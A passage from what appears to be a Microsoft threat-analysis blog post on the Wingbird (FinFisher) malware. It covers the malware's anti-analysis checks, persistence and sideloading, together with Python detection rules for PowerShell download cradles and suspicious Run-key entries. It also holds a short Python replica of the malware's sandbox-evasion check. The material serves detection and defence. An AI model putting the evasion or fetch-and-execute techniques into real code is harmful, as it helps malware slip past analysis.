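    re.compile(r"(?i)downloadstring|downloadfile"),  # WebClient fetch
    re.compile(r"(?i)invoke-expression|\biex\b"),    # execute fetched text
]

def looks_like_cradle(cmdline):
    """Flag command lines resembling PowerShell download cradles; also
    decode -EncodedCommand payloads (base64 of UTF-16LE) and rescan."""
    if any(p.search(cmdline) for p in CRADLE_PATTERNS):
        return True
    m = re.search(r"(?i)-enc\w*\s+([A-Za-z0-9+/=]+)", cmdline)
    if m:
        try:
            decoded = base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
        except Exception:
            return False
        return any(p.search(decoded) for p in CRADLE_PATTERNS)
    return False
```

Applied to process-creation logs, a rule like this surfaces most commodity downloaders, though determined attackers can of course obfuscate past it.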

However, every now and then, we stumble upon an interesting piece of malware that particularly catches our attention. One such malware is Wingbird, also known as FinFisher, which was used in one of the targeted attacks using the CVE-2017-8759 exploit.

WingBird (also known as FinFisher)

Wingbird is an advanced piece of malware that shares characteristics with FinFisher, a government-grade commercial surveillance product. The activity group NEODYMIUM is known to use this malware in its attack campaigns.

The group behind WingBird has proven to be highly capable of using zero-day exploits in their attacks, as mentioned in our previous blog post on CVE-2017-8759. So far, we have seen the group use the exploits below in campaigns. These are mostly in line with the findings of Kaspersky Labs, which they documented in a blog:

  • CVE-2015-5119 (Adobe Flash)
  • CVE-2016-4117 (Adobe Flash)
  • CVE-2017-8759 (Microsoft Office)
  • CVE-2017-11292 (Adobe Flash)

The interesting part of this malware is its use of spaghetti code, multiple virtual machines, and lots of anti-debug and anti-analysis techniques. Due to the complexity of the threat, it could take analysts some time to completely unravel its functionality. Here's a summary of interesting tidbits, which we will expand on in an upcoming detailed report on Wingbird.

The Wingbird malware goes through many stages of execution and has at least four VMs protecting the malware code. The first few stages are loaders that probe whether they are being run in a virtualized or debugged environment. We found at least 12 different checks designed to evade the malware's execution in such environments. The most effective ones are:

  • Sandbox environment checks
    • Checks if the malware is executed under the root folder of a drive
    • Checks if the malware file is readable from an external source and if the execution path contains the MD5 of its own contents

  • Fingerprinting check
    • Checks if the machine GUID, Windows product ID, and system BIOS are from well-known sources
  • VM detection
    • Checks if the machine hardware IDs are VmBus in the case of Hyper-V, or VEN_15AD in the case of VMware, etc.
  • Debugger detection
    • Detects debugger and tries to kill it using undocumented APIs and information classes (specifically ThreadHideFromDebugger, ProcessDebugPort, ProcessDebugObjectHandle)
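The "execution path contains the MD5 of its own contents" check above is easy to reproduce: many sandboxes rename submitted samples to their hash before detonating them, so the malware hashes its own file and looks for the digest in its path. A sketch of the same logic:

```python
import hashlib
import os
import sys

def path_contains_own_md5(path=None):
    """Replicate the reported evasion check: hash the running file's
    contents and test whether the hex digest appears in its own path
    (sandboxes often rename samples to their hash before execution)."""
    path = path or os.path.abspath(sys.argv[0])
    with open(path, "rb") as f:
        digest = hashlib.md5(f.read()).hexdigest()
    return digest.lower() in path.lower()
```

When the check returns True, the sample assumes it is under analysis and bails out before unpacking any payload.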

The latter stages act as an installation program that drops the following files on the disk and installs the malware based on the startup command received from the previous stage:

  • [randomName].cab – Encrypted configuration file
  • setup.cab – The last PE code section of the setup module; content still unknown
  • d3d9.dll – Malware loader used on systems with restricted privileges; the module is protected by a VM
  • aepic.dll (or other name) – Malware loader used on admin-privileged systems; executed from (and injected into) a fake service; protected by a VM
  • msvcr90.dll – Malware loader DLL injected into the explorer.exe or winlogon.exe process; protected by a VM
  • [randomName].7z – Encrypted network plugin, used to spy on the victim's network communications
  • wsecedit.rar – Main dropped malware executable, protected by a VM

In the sample we analyzed, the command was 3, which led the malware to create a global event, 0x0A7F1FFAB12BB2, and drop malware components under a folder located in %ProgramData% or in the %APPDATA% folder. If the malware is running with restricted privileges, persistence is achieved by setting the RUN key with the value below. The name of the key is taken from the encrypted configuration file.

HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Value: “{Random value taken from config file}”
With data: “C:\WINDOWS\SYSTEM32\RUNDLL32.EXE C:\PROGRAMDATA\AUDITAPP\D3D9.DLL, CONTROL_RUN”
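A hunting rule for this kind of persistence entry can combine three traits: rundll32, a DLL in a user-writable directory, and an exported entry point after the DLL path. The heuristic below is illustrative only; real environments will need tuning to avoid false positives:

```python
import re

def suspicious_run_value(data):
    """Flag Run-key data resembling the persistence entry described
    above: rundll32 loading a DLL from a user-writable directory with
    an explicit entry point. Heuristic sketch only."""
    d = data.lower()
    uses_rundll32 = "rundll32" in d
    user_writable = any(p in d for p in
                        ("\\programdata\\", "\\appdata\\",
                         "%programdata%", "%appdata%"))
    loads_dll = re.search(r"\.dll\s*,\s*\w+", d) is not None
    return uses_rundll32 and user_writable and loads_dll
```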

If the startup command is 2, the malware copies explorer.exe into the local installation directory, renames d3d9.dll to uxtheme.dll, and creates a new explorer.exe process that loads the malware DLL into memory using the DLL sideloading technique.

All of Wingbird's plugins are stored in its resource section and provide the malware with various capabilities, including stealing sensitive information, spying on internet connections, and even diverting SSL connections.

Given the complex nature of the threat, we will provide more detailed analysis of the Wingbird protection mechanism and capabilities in an upcoming blog post.

Detecting Office exploit attacks with Office 365 ATP and Windows Defender Suite

Microsoft Office 365 Advanced Threat Protection blocks attacks that use these exploits based on the detection of malicious behaviors. Office 365 ATP helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files, leveraging time-of-click protection. SecOps personnel can see ATP behavioral detections like the one below in Office 365's Threat Explorer page:

Figure 7. Office 365 ATP detection

Customers using Windows Defender Advanced Threat Protection can also see multiple alerts raised based on the activities performed by the exploit on compromised machines. Windows Defender ATP is a post-breach solution that alerts SecOps personnel about hostile activity. Windows Defender ATP uses rich security data, advanced behavioral analytics, and machine learning to detect attacks.

Figure 8. Windows Defender ATP alert

In addition, enterprises can block malicious documents using Windows Defender Exploit Guard, which is part of the defense-in-depth protection in Windows 10 Fall Creators Update. The Attack Surface Reduction (ASR) feature in Windows Defender Exploit Guard uses a set of built-in intelligence that can block malicious behaviors observed in malicious documents. ASR rules can also be turned on to block malicious attachments from being run or launched from Microsoft Outlook or webmail (such as Gmail, Hotmail, or Yahoo!).

Figure 9. Windows Defender Exploit Guard detection

Crimeware and targeted activity groups are always on the lookout for attack vectors to infiltrate systems and networks and deploy different kinds of payloads, from commodity to advanced implants. These attack vectors include Office exploits, which we observed in multiple attack campaigns. The availability of open-source and off-the-shelf exploit builders helps drive this trend.

At Microsoft, we don't stop working to protect our customers' mailboxes. Our global network of expert research teams continuously monitors the threat landscape for new malware campaigns, exploits, and attack methods. Our end-to-end defense suite includes Office 365 ATP, Windows Defender ATP, and Windows Defender Exploit Guard, among others, which work together to provide holistic protection for individuals and enterprises.



from Eric Avena